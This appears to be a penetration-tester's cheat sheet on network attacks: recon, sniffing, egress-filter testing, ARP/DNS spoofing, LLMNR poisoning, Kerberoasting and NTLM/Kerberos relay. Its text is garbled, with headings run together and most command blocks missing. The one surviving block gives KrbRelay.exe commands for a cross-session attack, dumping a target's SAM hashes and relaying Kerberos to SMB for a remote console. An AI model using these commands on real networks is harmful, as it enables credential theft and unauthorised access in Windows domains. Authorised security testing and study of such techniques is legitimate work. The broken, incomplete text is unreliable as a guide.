Network Attacks
Network Recon
Host Discoverybash find_cidrs.sh eth0Dismap
NetScan - From Windows Host
Sniffing
Wireshark or tcpdump - Credentials in clear text ?
Miscellaneous TechniquesInteracting with UsersExtract NTLMv1, etc
Extract NTLMv2
NFS Data Extraction
Finding vulnerabilities - Above
Above is an invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise in the air. He’s invisible.

Convert pcapng to pcap
Open outbound ports / Filtering
Web content filtering
For example, try to connect to 4chan or exploit-db with CLI but also with a browser

Living Off Trusted Sites
Try to access some of LOTS
Port Filtering
Test for other ports: 22, 21, 23, etc.


Protocol Filtering
For example, if port 22 is blocked, also test for protocol filtering: SSH on port 443 ?
Server side:
Try to connect over port 443
The Protocol Filter feature is used to block unwanted traffic from your network. The feature is commonly used to make sure employees, students or end users are using their Internet access for its intended productive use. The filter can block dozens of different protocols, including: peer-to-peer traffic (Source: ClearOS)
ARP - DNS Spoofing
Bettercap
Standalone version:
Arpspoof
Eavesarp
Detect and exploit Stale Network Address Configurations (SNACs) via network traffic analysis and ARP poisoning techniques
LLMNR NBT-NS Poisoning
LLMNR NBT-NS PoisoningADIDNS Spoofing
ADIDNS SpoofingMITM6
MITM MySQL
Use CredSLayer to extract salts and password hash

MITM - ASReproast
MisconfigurationMITM - Kerberoast
KerberoastNo LDAP Signing - KrbRelayUp
No-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).
KrbRelay
Cross-session attack:
KrbRelay.exe -s <SESSION-ID> -clsid 354FF91B-5E49-4BDC-A8E6-1CB6C6877182 -ntlm
Read out local SAM database hashes:
KrbRelay.exe -cslid F8842F8E-DAFE-4B37-9D38-4E0714A61149 -session <TARGET-SESSION-ID> -spn cifs/<TARGET-SYSTEM>.<DOMAIN> -secrets
Relaying Kerberos to SMB for remote access:
KrbRelay.exe -cslid f8842f8e-dafe-4b37-9d38-4e0714a61149 -session <SESSION-ID> -spn cifs/<TARGET-SYSTEM>.<DOMAIN> -console
NTLM Relay
SMB (445, 139) / RPCAD CSKerberos Relay
Over HTTP
Over SMB
SMB (445, 139) / RPCAD CSVia DHCPv6-DNS-Takeover

Last updated


